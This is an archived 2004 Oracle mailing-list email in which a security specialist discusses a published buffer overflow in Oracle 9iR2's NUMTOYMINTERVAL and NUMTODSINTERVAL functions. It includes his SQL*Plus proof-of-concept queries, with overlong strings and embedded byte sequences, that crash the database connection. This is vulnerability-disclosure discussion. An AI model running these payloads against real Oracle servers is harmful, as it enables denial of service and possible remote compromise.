From oracle-l-bounce@freelists.org Thu Feb 26 14:42:10 2004 Return-Path: Received: from air189.startdedicated.com (root@localhost) by orafaq.com (8.11.6/8.11.6) with ESMTP id i1QKg9l10712 for ; Thu, 26 Feb 2004 14:42:10 -0600 X-ClientAddr: 206.53.239.180 Received: from turing.freelists.org (freelists-180.iquest.net [206.53.239.180]) by air189.startdedicated.com (8.11.6/8.11.6) with ESMTP id i1QKg9o10707 for ; Thu, 26 Feb 2004 14:42:09 -0600 Received: from turing (localhost [127.0.0.1]) by turing.freelists.org (Avenir Technologies Mail Multiplex) with ESMTP id 2E248396294; Thu, 26 Feb 2004 15:42:28 -0500 (EST) Received: with ECARTIS (v1.0.0; list oracle-l); Thu, 26 Feb 2004 15:41:23 -0500 (EST) X-Original-To: oracle-l@freelists.org Delivered-To: oracle-l@freelists.org Received: from anchor-post-34.mail.demon.net (anchor-post-34.mail.demon.net [194.217.242.92]) by turing.freelists.org (Avenir Technologies Mail Multiplex) with ESMTP id 001783960E0 for ; Thu, 26 Feb 2004 15:41:20 -0500 (EST) Received: from peterfinnigan.demon.co.uk ([212.228.17.70]) by anchor-post-34.mail.demon.net with esmtp (Exim 3.35 #1) id 1AwSMe-0003BD-0Y for oracle-l@freelists.org; Thu, 26 Feb 2004 20:44:14 +0000 Message-ID: Date: Thu, 26 Feb 2004 20:42:44 +0000 To: oracle-l@freelists.org From: Pete Finnigan Subject: Re: [NEWS] Oracle Database 9ir2 Interval Conversion Buffer Overflow References: In-Reply-To: MIME-Version: 1.0 X-Mailer: Turnpike Integrated Version 5.01 S X-archive-position: 2165 X-ecartis-version: Ecartis v1.0.0 Sender: oracle-l-bounce@freelists.org Errors-To: oracle-l-bounce@freelists.org X-original-sender: oracle_list@peterfinnigan.demon.co.uk Precedence: normal Reply-To: oracle-l@freelists.org X-list: oracle-l Hi Jared, I heard about this issue in early Feb. This guy Cesar Cerrudo posted a message to vulnwatch about these two vulnerabilities and also said he had a lot more. I saw a post on Bugtraq yesterday where someone was asking for the patch info. It is not clear if an Oracle fix matches this bug or not and which patch applies. There is no advisory. Here is the header info from vulnwatch from his post. I have the full email sent to vulnwatch which is similar to Jared's version on securiteam but is longer (no extra technical details mostly rants) From: Cesar [mailto:cesarc56@yahoo.com] Sent: Thu 2004-02-05 3:15 PM To: vulnwatch@vulnwatch.org Cc: Subject: [VulnWatch] Oracle Database 9ir2 Interval Conversion Functions Buffer Overflow Security Advisory Name: Oracle Database 9ir2 Interval Conversion Functions Buffer Overflow. System Affected : Oracle Database 9ir2, previous versions could be affected too. Severity : High Remote exploitable : Yes Author: Cesar Cerrudo. Date: 02/05/04 Advisory Number: CC020401 Anyway I have run the following test based on what he said in his advisory: SQL> edit Wrote file afiedt.buf 1 SELECT NUMTOYMINTERVAL(1,'AAAAAAAAAABBBBBBBBBBCCCCCCCCCCABCDEFGHIJK LMNOPQR' 2 || chr(59)||chr(79)||chr(150)||chr(01)||chr(141)||chr(68)||chr(36)| |chr(18)||chr(80)||chr(255)| 3 ||chr(52)||chr(35)||chr(148)||chr(01)||chr(255)||chr(37)||chr(172)| |chr(33)||chr(148)||chr(01)| 4* ARE YOU SURE? >c:\Unbreakable.txt') FROM DUAL SQL> / ARE YOU SURE? >c:\Unbreakable.txt') FROM DUAL * ERROR at line 4: ORA-03113: end-of-file on communication channel SQL> select sysdate from dual; select sysdate from dual * ERROR at line 1: ORA-03114: not connected to ORACLE SQL> SQL> connect system/manager@sans Connected. SQL> edit Wrote file afiedt.buf 1 SELECT NUMTODSINTERVAL(1,'AAAAAAAAAABBBBBBBBBBCCCCCCCCCCABCDEFGHIJK LMNOPQR' 2 || chr(59)||chr(79)||chr(150)||chr(01)||chr(141)||chr(68)||chr(36)| |chr(18)||chr(80)||chr(255)| 3 ||chr(52)||chr(35)||chr(148)||chr(01)||chr(255)||chr(37)||chr(172)| |chr(33)||chr(148)||chr(01)| 4* ARE YOU SURE? >c:\Unbreakable.txt') FROM DUAL SQL> / SELECT NUMTODSINTERVAL(1,'AAAAAAAAAABBBBBBBBBBCCCCCCCCCCABCDEFGHIJKLMNOP QR' * ERROR at line 1: ORA-03113: end-of-file on communication channel SQL> select sysdate from dual; select sysdate from dual * ERROR at line 1: ORA-03114: not connected to ORACLE SQL> So yes both of these vulnerabilities will terminate the Oracle connection so its possible it could be exploited remotely. The file > c:\Unbreakable.txt is not created though. I have not tried under a debugger to see if anything can be done with the 3113 error in terms of exploiting the stack. If this is a true buffer overflow exploit then he would need to pass some sort of shell code and manipulate the stack to run it. Maybe his chr(??) are some sort of shell code for it to be a buffer overflow and capture the machine. On the surface it doesn't seem to work though. SQL*net trace didn't tell me much and also an Oracle core is created in the cdump directory with the are you sure text on the top of the stack. I ran this on XP 9ir2 personal edition. Kind regards Pete -- Pete Finnigan email:pete@petefinnigan.com Web site: http://www.petefinnigan.com - Oracle security audit specialists Book:Oracle security step-by-step Guide - see http://store.sans.org for details. ---------------------------------------------------------------- Please see the official ORACLE-L FAQ: http://www.orafaq.com ---------------------------------------------------------------- To unsubscribe send email to: oracle-l-request@freelists.org put 'unsubscribe' in the subject line. -- Archives are at http://www.freelists.org/archives/oracle-l/ FAQ is at http://www.freelists.org/help/fom-serve/cache/1.html -----------------------------------------------------------------